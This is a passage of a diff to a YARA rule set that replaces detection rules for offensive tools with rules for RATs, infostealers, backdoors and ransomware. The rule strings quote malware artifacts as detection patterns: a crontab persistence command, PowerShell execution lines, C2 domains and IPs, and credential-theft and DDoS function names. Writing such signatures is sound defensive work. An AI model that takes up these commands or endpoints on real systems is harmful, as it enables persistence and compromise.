 		author = "ditekSHen"
-		id = "d126f2c8-655f-564f-ae46-f6bd6385dcac"
+		id = "0ca581c3-bce2-5b4f-8146-9aeb49b88813"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L976-L990"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2209-L2220"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "08c7b2c4725431c1bf85ae8068f4250c98e58890e3b4c97aa9e419e4f487cada"
+		logic_hash = "192378d903316c1d80b064e78feb6ed9d2ffc9e6c7dc0c8df223d83d17e4e8d9"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "chisel-v" ascii
-		$s2 = "sendchisel-v" ascii
-		$s3 = "<-chiselclosedcookiedomainefenceempty" ascii
-		$ws1 = "Sec-WebSocket-Key" ascii
-		$ws2 = "Sec-WebSocket-Protocol" ascii
-		$ws3 = "Sec-Websocket-Version" ascii
-		$ws4 = "Sec-Websocket-Extensions" ascii
+		$s1 = "for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done" fullword ascii
+		$s2 = "cp /lib/libudev.so /lib/libudev.so.6" fullword ascii
+		$s3 = "sed -i '/\\/etc\\/cron.hourly\\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab" fullword ascii
+		$s4 = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 1 of ( $s* ) and 3 of ( $ws* ) )
+		uint32( 0 ) == 0x464c457f and 3 of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_ANT_Sharpedrchecker : FILE
+rule DITEKSHEN_MALWARE_Win_Blacknet : FILE
 {
 	meta:
-		description = "Detect SharpEDRChecke, C# Implementation of Invoke-EDRChecker"
+		description = "Detects BlackNET RAT"
 		author = "ditekSHen"
-		id = "c0b41787-b8b4-5aa7-b1f0-0a89dbebe45e"
+		id = "c1ece46a-3cd9-54aa-a105-1c5b19357a7e"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L992-L1023"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2222-L2250"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "77a26ff5298dddebc669d9b6c39905a48a86884cf98adebdf935b94c62d36ddc"
+		logic_hash = "64e00325a5a6a595067c6133800e73d943f45e2783475c24ed4a9bd9937fe0d6"
 		score = 75
-		quality = 23
+		quality = 75
 		tags = "FILE"
+		snort2_sid = "920079-920082"
+		snort3_sid = "920079-920082"
+		clamav_sig = "MALWARE.Win.Trojan.BlackNET"
 
 	strings:
-		$pdb1 = "\\SharpEDRChecker.pdb" fullword ascii
-		$x1 = "EDRData" fullword ascii
-		$x2 = "bytesNeeded" fullword ascii
-		$x3 = /\] Checking (Directories|drivers|processes|modules|Registry|Services) \[/ wide
-		$s1 = "CheckService" fullword ascii
-		$s2 = "CheckModule" fullword ascii
-		$s3 = "PrivCheck" fullword ascii
-		$s4 = "ServiceChecker" fullword ascii
-		$s5 = "PrivilegeChecker" fullword ascii
-		$s6 = "FileChecker" fullword ascii
-		$s7 = "DriverChecker" fullword ascii
-		$s8 = "ProcessChecker" fullword ascii
-		$s9 = "DirectoryChecker" fullword ascii
-		$s10 = "RegistryChecker" fullword ascii
-		$s11 = "CheckDriver" fullword ascii
-		$s12 = "CheckServices" fullword ascii
-		$s13 = "CheckDirectories" fullword ascii
-		$s14 = "CheckCurrentProcessModules" fullword ascii
-		$s15 = "CheckProcesses" fullword ascii
-		$s16 = "CheckDrivers" fullword ascii
-		$s17 = "CheckProcess" fullword ascii
-		$s18 = "CheckSubDirectory" fullword ascii
-		$s19 = "CheckDirectory" fullword ascii
-		$s20 = "CheckRegistry" fullword ascii
+		$s1 = "SbieCtrl" fullword wide
+		$s2 = "SpyTheSpy" fullword wide
+		$s3 = "\\BlackNET.dat" fullword wide
+		$s4 = "StartDDOS" fullword wide
+		$s5 = "UDPAttack" fullword wide
+		$s6 = "ARMEAttack" fullword wide
+		$s7 = "TCPAttack" fullword wide
+		$s8 = "HTTPGetAttack" fullword wide
+		$s9 = "RetriveLogs" fullword wide
+		$s10 = "StealPassword" fullword wide
+		$s11 = "/create /f /sc ONSTART /RL HIGHEST /tn \"'" fullword wide
+		$b1 = "DeleteScript|BN|" fullword wide
+		$b2 = "|BN|Online" fullword wide
+		$b3 = "NewLog|BN|" fullword wide
+		$cnc1 = "/getCommand.php?id=" fullword wide
+		$cnc2 = "/upload.php?id=" fullword wide
+		$cnc3 = "connection.php?data=" fullword wide
+		$cnc4 = "/receive.php?command=" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or 10 of ( $s* ) or ( 1 of ( $pdb* ) and ( 1 of ( $x* ) or 2 of ( $s* ) ) ) or ( #x3 > 4 and 2 of them ) )
+		uint16( 0 ) == 0x5a4d and ( 9 of ( $s* ) or all of ( $cnc* ) or all of ( $b* ) or 12 of them )
 }
-rule DITEKSHEN_INDICATOR_TOOL_ANT_Invizzzible : FILE
+rule DITEKSHEN_MALWARE_Win_Stormkitty : FILE
 {
 	meta:
-		description = "Detect InviZzzible"
+		description = "Detects StormKitty infostealer"
 		author = "ditekSHen"
-		id = "23533d1c-e0d8-51c8-ac18-60c845bff197"
+		id = "a061a1c0-9ed5-5048-85df-4d7ed6995e92"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1025-L1059"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2252-L2269"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "bd84015f9fdc160a6ed9010c5a5905fcf13987b1fdec6fdd9535e315dc3617e8"
+		logic_hash = "5d139aad6932f177cd14e0356f822ad68ddc659ea4fabd2fd2fbcbc8bad58888"
 		score = 75
-		quality = 48
+		quality = 75
 		tags = "FILE"
+		clamav_sig = "MALWARE.Win.Trojan.StormKitty"
 
 	strings:
-		$s1 = "\\\\.\\pipe\\task_sched_se" fullword wide
-		$s2 = "\\\\\\.\\NPF_NdisWanIp" fullword wide
-		$s3 = /--action --(dtt|mra|user-input|cfg|dan|evt|pid|exc|wmi|tsh)/ fullword wide
-		$s4 = "cuckoo_%lu.ini" fullword wide
-		$s5 = "sandbox evasion" wide nocase
-		$s6 = "UnbalancedStack" fullword ascii
-		$s7 = "process_with_long_name" fullword ascii
-		$s8 = "DelaysAccumulation" fullword ascii
-		$s9 = "PidReuse" fullword ascii
-		$s10 = "DeadAnalyzer" fullword ascii
-		$s11 = "SleepDummyPatch" fullword ascii
-		$s12 = "AudioDeviceAbsence" fullword ascii
-		$s14 = "\\\\.\\PhysicalDrive%u" fullword ascii
-		$s15 = "\"countermeasures\":" ascii
-		$s16 = "_%.02u%.02u%.02u_%.02u%.02u%.02u.html" ascii
-		$f1 = ".?AVHyperV@SandboxEvasion@@" ascii
-		$f2 = ".?AVJoebox@SandboxEvasion@@" ascii
-		$f3 = ".?AVKVM@SandboxEvasion@@" ascii
-		$f4 = ".?AVMisc@SandboxEvasion@@" ascii
-		$f5 = ".?AVParallels@SandboxEvasion@@" ascii
-		$f6 = ".?AVQEMU@SandboxEvasion@@" ascii
-		$f7 = ".?AVSandboxie@SandboxEvasion@@" ascii
-		$f8 = ".?AVVBOX@SandboxEvasion@@" ascii
-		$f9 = ".?AVVirtualPC@SandboxEvasion@@" ascii
-		$f10 = ".?AVVMWare@SandboxEvasion@@" ascii
-		$f11 = ".?AVWine@SandboxEvasion@@" ascii
-		$f12 = ".?AVXen@SandboxEvasion@@" ascii
+		$x1 = "\\ARTIKA\\Videos\\Chrome-Password-Recovery" ascii
+		$x2 = "https://github.com/LimerBoy/StormKitty" fullword ascii
+		$x3 = "StormKitty" fullword ascii
+		$s1 = "GetBSSID" fullword ascii
+		$s2 = "GetAntivirus" fullword ascii
+		$s3 = "C:\\Users\\Public\\credentials.txt" fullword wide
+		$s4 = "^([a-zA-Z0-9_\\-\\.]+)@([a-zA-Z0-9_\\-\\.]+)\\.([a-zA-Z]{2,5})$" fullword wide
+		$s5 = "BCrypt.BCryptGetProperty() (get size) failed with status code:{0}" fullword wide
+		$s6 = "\"encrypted_key\":\"(.*?)\"" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 6 of ( $s* ) or 4 of ( $f* ) or ( 2 of ( $f* ) and 2 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or 5 of ( $s* ) or ( 3 of ( $s* ) and 1 of ( $x* ) ) )
 }
-rule DITEKSHEN_INDICATOR_TOOL_EXFIL_Sharpbox : FILE
+
+rule DITEKSHEN_MALWARE_Win_Bulz01 : FILE
 {
 	meta:
-		description = "Detect SharpBox, C# tool for compressing, encrypting, and exfiltrating data to Dropbox using the Dropbox API"
+		description = "Detects trojan loader"
 		author = "ditekSHen"
-		id = "cd834fe2-dc77-509d-a8f9-d631f395bcd8"
+		id = "4ac4125b-70f5-5cda-ae45-fd5713e25a6e"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1061-L1080"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2271-L2281"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b03ab3786b2a2e6774d94be4edf700a7154d8d400c7b2b31c73c68ce9fe0c08a"
+		logic_hash = "29884dda4936016660f5d1e33ffcf97a20c7d3116483a5895a5e2a1dd4ac9e9f"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "UploadData" fullword ascii
-		$s2 = "isAttached" fullword ascii
-		$s3 = "DecryptFile" fullword ascii
-		$s4 = "set_dbxPath" fullword ascii
-		$s5 = "set_dbxToken" fullword ascii
-		$s6 = "set_decrypt" fullword ascii
-		$s7 = "GeneratePass" fullword ascii
-		$s8 = "FileUploadToDropbox" fullword ascii
-		$s9 = "\\SharpBox.pdb" ascii
-		$s10 = "https://content.dropboxapi.com/2/files/upload" fullword wide
-		$s12 = "Dropbox-API-Arg: {\"path\":" wide
-		$s13 = "X509Certificate [{0}] Policy Error: '{1}'" fullword wide
+		$s1 = "DisableTrivet.dll" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 7 of them
+		uint16( 0 ) == 0x5a4d and pe.is_dll ( ) and all of ( $s* ) and ( pe.exports ( "Ordinal" ) or pe.exports ( "Chechako" ) or pe.exports ( "Originator" ) or pe.exports ( "Repressions" ) )
 }
-rule DITEKSHEN_INDICATOR_TOOL_EXP_Serioussam01 : CVE_2021_36934 FILE
+rule DITEKSHEN_MALWARE_Win_Revcoderat : FILE
 {
 	meta:
-		description = "Detect tool variants potentially exploiting SeriousSAM / HiveNightmare CVE-2021-36934"
+		description = "Detects RevCode/WebMonitor RAT"
 		author = "ditekSHen"
-		id = "e8f24ae4-48fb-5ee7-9e8e-0d144bb3b046"
+		id = "4acf6742-7f5c-5126-89cc-b39b1acd922e"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1082-L1104"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2283-L2332"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8b9de87dc073e6ba3eb36dd57b31e9749849c2e277f2bcd1c98ffc2d02861e10"
+		logic_hash = "e5bf1ce79b7955f597df1a9e361a3be892de55cd3db767278d4ccc02ace9e9f5"
 		score = 75
-		quality = 25
-		tags = "CVE-2021-36934, FILE"
+		quality = 48
+		tags = "FILE"
+		snort2_sid = "920070"
+		snort3_sid = "920070"
+		clamav_sig = "MALWARE.Win.Trojan.RevCodeRAT"
 
 	strings:
-		$s1 = "VolumeShadowCopy" fullword wide
-		$s2 = "\\\\?\\GLOBALROOT\\Device\\" fullword wide
-		$s3 = "{0}\\{1}$:aad3b435b51404eeaad3b435b51404ee:{2}" fullword wide
-		$s4 = "ASPNET_WP_PASSWORD" fullword wide
-		$s5 = "<ParseSam>b__" ascii
-		$s6 = "<DumpSecret" ascii
-		$s7 = "<ParseSecret" ascii
-		$s8 = "LsaSecretBlob" fullword ascii
-		$s9 = "systemHive" fullword ascii
-		$s10 = "ImportHiveDump" fullword ascii
-		$s11 = "FindShadowVolumes" fullword ascii
-		$s12 = "GetBootKey" fullword ascii
-		$r1 = "[*] SAM" wide
-		$r2 = "[*] SYSTEM" wide
-		$r3 = "[*] SECURITY" wide
+		$x1 = "rev-novm.dat" fullword wide
+		$x2 = "WebMonitor-" fullword wide
+		$x3 = "WebMonitor Client" fullword wide
+		$x4 = "Launch WebMonitor" fullword wide
+		$s1 = "KEYLOG_DEL" fullword ascii
+		$s2 = "KEYLOG_STREAM_START" fullword ascii
+		$s3 = "send_keylog_del" fullword ascii
+		$s4 = "send_keylog_stream_" ascii
+		$s5 = "send_shell_exec" fullword ascii
+		$s6 = "send_file_download_exec" fullword ascii
+		$s7 = "send_pdg_exec" fullword ascii
+		$s8 = "send_app_cmd_upd" fullword ascii
+		$s9 = "send_webcamstream_start" fullword ascii
+		$s10 = "send_screenstream_start" fullword ascii
+		$s11 = "send_clipboard_get" fullword ascii
+		$s12 = "send_pdg_rev_proxy_stop" fullword ascii
+		$s13 = "send_shell_stop" fullword ascii
+		$s14 = "send_wnd_cmd" fullword ascii
+		$s15 = "SCREEN_STREAM_LEGACY(): Started..." fullword ascii
+		$s16 = "SYSTEM_INFORMATION(): Failed! (Error:" fullword ascii
+		$s17 = "TARGET_HOST_UPDATE(): Sync successful!" fullword ascii
+		$s18 = "PLUGIN_PROCESS_REVERSE_PROXY: Plugin" ascii
+		$s19 = "PLUGIN_PROCESS: Plugin" ascii
+		$s20 = "PLUGIN_EXEC: Plugin" ascii
+		$s21 = "PLUGIN_PROCESS_SCREEN_STREAM: Plugin" ascii
+		$cnc1 = "?task_id=" fullword ascii
+		$cnc2 = "&operation=" fullword ascii
+		$cnc3 = "&filesize=" fullword ascii
+		$cnc4 = "pos=" fullword ascii
+		$cnc5 = "&mode=" fullword ascii
+		$cnc6 = "&cmp=1" fullword ascii
+		$cnc7 = "&cmp=0" fullword ascii
+		$cnc8 = "&enc=1" fullword ascii
+		$cnc9 = "&enc=0" fullword ascii
+		$cnc10 = "&user=" fullword ascii
+		$cnc11 = "&uid=" fullword ascii
+		$cnc12 = "&key=" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 6 of ( $s* ) or ( all of ( $r* ) and 3 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and ( 3 of ( $x* ) or all of ( $cnc* ) or 8 of ( $s* ) or ( 1 of ( $x* ) and 6 of ( $s* ) ) or ( 6 of ( $cnc* ) and 6 of ( $s* ) ) )
 }
-rule DITEKSHEN_INDICATOR_TOOL_EXP_Petitpotam01 : FILE
+rule DITEKSHEN_MALWARE_Win_Powerpool_STG1 : FILE
 {
 	meta:
-		description = "Detect tool potentially exploiting/attempting PetitPotam"
+		description = "Detects first stage PowerPool backdoor"
 		author = "ditekSHen"
-		id = "12d7b533-f477-5fbb-8b1f-1a93c9a63500"
+		id = "8531c22d-8d71-5794-b9c8-0a4cd81bb2b0"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1127-L1143"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2334-L2361"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "37a9477b41560904e8874ecaf93eb2667b9450b5d42665677abc1442538f9000"
+		logic_hash = "9ab00d6e3007743a8bb30fbcdb435ac49101b52face55549ae454c64345caff9"
 		score = 75
-		quality = 25
+		quality = 75
 		tags = "FILE"
+		snort2_sid = "920088"
+		snort3_sid = "920086"
+		clamav_sig = "MALWARE.Win.Trojan.PowerPool-STG-1"
 
 	strings:
-		$s1 = "\\pipe\\lsarpc" fullword wide
-		$s2 = "\\%s" fullword wide
-		$s3 = "ncacn_np" fullword wide
-		$s4 = /EfsRpc(OpenFileRaw|EncryptFileSrv|DecryptFileSrv|QueryUsersOnFile|QueryRecoveryAgents|RemoveUsersFromFile|AddUsersToFile)/ wide
-		$r1 = "RpcBindingFromStringBindingW" fullword ascii
-		$r2 = "RpcStringBindingComposeW" fullword ascii
-		$r3 = "RpcStringFreeW" fullword ascii
-		$r4 = "RPCRT4.dll" fullword ascii
-		$r5 = "NdrClientCall2" fullword ascii
+		$s1 = "cmd /c powershell.exe $PSVersionTable.PSVersion > \"%s\"" fullword wide
+		$s2 = "cmd /c powershell.exe \"%s\" > \"%s\"" fullword wide
+		$s3 = "rar.exe a -r %s.rar -ta%04d%02d%02d%02d%02d%02d -tb%04d%02d%02d%02d%02d%02d" fullword wide
+		$s4 = "MyDemonMutex%d" fullword wide
+		$s5 = "MyScreen.jpg" fullword wide
+		$s6 = "proxy.log" fullword wide
+		$s7 = "myjt.exe" fullword wide
+		$s8 = "/?id=%s&info=%s" fullword wide
+		$s9 = "auto.cfg" fullword ascii
+		$s10 = "Mozilla/5.0 (Windows NT 6.1; WOW64)" fullword wide
+		$s11 = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)" fullword wide
+		$s12 = "CMD COMMAND EXCUTE ERROR!" fullword ascii
+		$c1 = "run.afishaonline.eu" fullword wide
+		$c2 = "home.Sports-Collectors.com" fullword wide
+		$c3 = "about.Sports-Collectors.com" fullword
+		$c4 = "179.43.158.15" fullword wide
+		$c5 = "185.227.82.35" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) and 4 of ( $r* ) )
+		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or ( 1 of ( $c* ) and 5 of ( $s* ) ) )
 }
-rule DITEKSHEN_INDICATOR_TOOL_PET_Sharpstrike : FILE
+rule DITEKSHEN_MALWARE_Win_Powerpool_STG2 : FILE
 {
 	meta:
-		description = "Detect SharpStrike post-exploitation tool written in C# that uses either CIM or WMI to query remote systems"
+		description = "Detects second stage PowerPool backdoor"
 		author = "ditekSHen"
-		id = "00b36fce-3d84-51cf-a800-042d7484d78c"
+		id = "1a059900-3292-5419-a143-caea3e710191"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1145-L1160"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2363-L2395"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c479d85878d9f9659fc157f0c6706703af3748a8740df6a5090cddc720dd7661"
+		logic_hash = "b80712bab281dbde816e2eda6ab1b4a9e21be26578fb755a1e1e1635675aa911"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
+		snort2_sid = "920089-920091"
+		snort3_sid = "920087-920089"
+		clamav_sig = "MALWARE.Win.Trojan.PowerPool-STG-2"
 
 	strings:
-		$x1 = "SharpStrike v" wide
-		$x2 = "[*] Agent is busy" wide
-		$x3 = "SharpStrike_Fody" fullword ascii
-		$s1 = "ServiceLayer.CIM" fullword ascii
-		$s2 = "Models.CIM" fullword ascii
-		$s3 = "<HandleCommand>b__" ascii
-		$s4 = "MemoryStream" fullword ascii
-		$s5 = "GetCommands" fullword ascii
+		$s1 = "write info fail!!! GetLastError-->%u" fullword ascii
+		$s2 = "LookupAccountSid Error %u" fullword ascii
+		$s3 = "Mozilla/4.0 (compatible; )" fullword ascii
+		$s4 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)" fullword ascii
+		$s5 = "Content-Disposition: form-data; name=\"%s\"" fullword ascii
+		$s6 = "Content-Disposition: form-data; name=\"%s\"; filename=\"%s\"" fullword ascii
+		$s7 = "Content-Type: multipart/form-data; boundary=--MULTI-PARTS-FORM-DATA-BOUNDARY" fullword ascii
+		$s8 = "in Json::Value::find" fullword ascii
+		$s9 = "in Json::Value::resolveReference" fullword ascii
+		$s10 = "in Json::Value::duplicateAndPrefixStringValue" fullword ascii
+		$s11 = ".?AVLogicError@Json@@" fullword ascii
+		$s12 = ".?AVRuntimeError@Json@@" fullword ascii
+		$s13 = "http:\\\\82.221.101.157:80" ascii
+		$s14 = "http://172.223.112.130:80" ascii
+		$s15 = "http://172.223.112.130:443" ascii
+		$s16 = "http://info.newsrental.net:80" ascii
+		$s17 = "%s|%I64d" ascii
+		$s18 = "open internet failed..." ascii
+		$s19 = "connect failed..." ascii
+		$s20 = "handle not opened..." ascii
+		$s21 = "corrupted regex pattern" fullword ascii
+		$s22 = "add cookie failed..." ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or all of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and 14 of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_LTM_Ladon : FILE
+
+rule DITEKSHEN_MALWARE_Win_Egregor : FILE
 {
 	meta:
-		description = "Detect Ladon tool that assists in lateral movement across a network"
+		description = "Detects Egregor ransomware variants"
 		author = "ditekSHen"
-		id = "227e63ce-8383-5bb1-870e-6c4e767b402f"
+		id = "2e24d4ec-39c2-5148-80a1-04f96bc8b477"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1162-L1178"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2397-L2434"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f31276bcbcae672966cfddc9af4f5b507d7244360b421de7fe1e811fb954fb7d"
+		logic_hash = "d39a7bf89a7574f7dfe56db78c8cdbbee97782f829805d4ee87fd9f1635154cd"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		clamav_sig = "MALWARE.Win.Ransomware.Egregor"
 
 	strings:
-		$d1 = "Ladon.VncSharp.dll" fullword ascii
-		$d2 = "Ladon.Renci.SshNet.dll" fullword ascii
-		$s1 = "Ladon." ascii
-		$s2 = "nowPos" fullword ascii
-		$s3 = "Scan" fullword ascii
-		$s4 = "QLZ_STREAMING_BUFFER" fullword ascii
-		$s5 = "sizeDecompressed" fullword ascii
-		$s6 = "UpdateByte" fullword ascii
-		$s7 = "kNumBitPriceShiftBits" fullword ascii
+		$s1 = "C:\\Logmein\\{888-8888-9999}\\Logmein.log" fullword wide
+		$p1 = "--deinstall" fullword wide
+		$p2 = "--del" fullword wide
+		$p3 = "--exit" fullword wide
+		$p4 = "--kill" fullword wide
+		$p5 = "--loud" fullword wide
+		$p6 = "--nooperation" fullword wide
+		$p7 = "--nop" fullword wide
+		$p8 = "--skip" fullword wide
+		$p9 = "--useless" fullword wide
+		$p10 = "--yourmommy" fullword wide
+		$p11 = "-passegregor" ascii wide
+		$p12 = "-peguard" ascii wide
+		$p13 = "--nomimikatz" ascii wide
+		$p14 = "--multiproc" ascii wide
+		$p15 = "--killrdp" ascii wide
+		$p16 = "--nonet" ascii wide
+		$p17 = "--norename" ascii wide
+		$p18 = "--greetings" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $d* ) or all of ( $s* ) or ( 1 of ( $d* ) and 5 of ( $s* ) ) )
+		( uint16( 0 ) == 0x5a4d and pe.is_dll ( ) and ( ( all of ( $s* ) and 1 of ( $p* ) ) or ( 2 of them and filesize < 1000KB and for any i in ( 0 .. pe.number_of_sections ) : ( ( pe.sections [ i ] . name == ".00cfg" ) ) ) ) ) or 8 of ( $p* )
 }
-rule DITEKSHEN_INDICATOR_TOOL_LTM_Ladonexp : FILE
+
+rule DITEKSHEN_MALWARE_Win_Redlinedropperexe : FILE
 {
 	meta:
-		description = "Detect Ladon tool that assists in lateral movement across a network"
+		description = "Detects executables dropping RedLine infostealer"
 		author = "ditekSHen"
-		id = "bd1e7ef5-ae68-5e0d-8261-0eb765453bae"
+		id = "364ba540-60a5-5e1b-bb21-505a442eabb6"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1180-L1191"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2461-L2484"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "22f6a717b8464bddd850bb5ea8b416e99bceb91fe917f188be178f2fff620730"
+		logic_hash = "cd1fb4a1d0883221dbdcc519db7f54b0f7285e8a19201dbc586c2520e8086bc2"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		clamav_sig = "MALWARE.Win.Trojan.RedLineDropper-EXE"
 
 	strings:
-		$s1 = "txt_cscandll.Text" fullword wide
-		$s2 = "CscanWebExpBuild.frmMain.resources" fullword ascii
-		$s3 = "= \"$HttpXforwardedFor$\";" ascii
-		$s4 = "namespace netscan" fullword ascii
+		$s1 = "Wizutezinod togeto0Rowadufevomuki futenujilazem jic lefogatenezinor" fullword wide
+		$s2 = "6Tatafamobevofaj bizafoju peyovavacoco lizine kezakajuj" fullword wide
+		$s3 = "Lawuherusozeru kucu zam0Zorizeyuk lepaposupu gala kinarusot ruvasaxehuwo" fullword wide
+		$s4 = "ClearEventLogW" fullword ascii
+		$s5 = "ProductionVersion" fullword wide
+		$s6 = "Vasuko)Yugenizugilobo toxocivoriye yexozoyohuzeb" wide
+		$s7 = "Yikezevavuzus gucajanesan#Rolapucededoxu xewulep fuwehofiwifi" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 3 of them
+		uint16( 0 ) == 0x5a4d and ( pe.exports ( "_fgeek@8" ) and 2 of them ) or ( 2 of them and for any i in ( 0 .. pe.number_of_sections ) : ( ( pe.sections [ i ] . name == ".rig" ) ) )
 }
-rule DITEKSHEN_INDICATOR_TOOL_LTM_Ladongo : FILE
+rule DITEKSHEN_MALWARE_Win_Nibiru : FILE
 {
 	meta:
-		description = "Detect LadonGo tool that assists in lateral movement across a network"
+		description = "Detects Nibiru ransomware"
 		author = "ditekSHen"
-		id = "4dbf7f24-b9ab-5629-8e78-667d9623dea9"
+		id = "78c3bf75-1ab3-5f88-ba4b-d5a0a906d57c"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1193-L1207"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2486-L2504"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "606172b8fb251cb4ad75de40b55d74779aef6409832f6edf09068083143ec749"
+		logic_hash = "f3718e9091b09e0f47ecd6715a3a2c160ede6ab9fb144e7ed115dd5a25c8e379"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		clamav_sig = "MALWARE.Win.Ransomware.Nibiru"
 
 	strings:
-		$f1 = "main.VulDetection" fullword ascii
-		$f2 = "main.BruteFor" fullword ascii
-		$f3 = "main.RemoteExec" fullword ascii
-		$f4 = "main.Exploit" fullword ascii
-		$f5 = "main.Noping" fullword ascii
-		$f6 = "main.LadonScan" fullword ascii
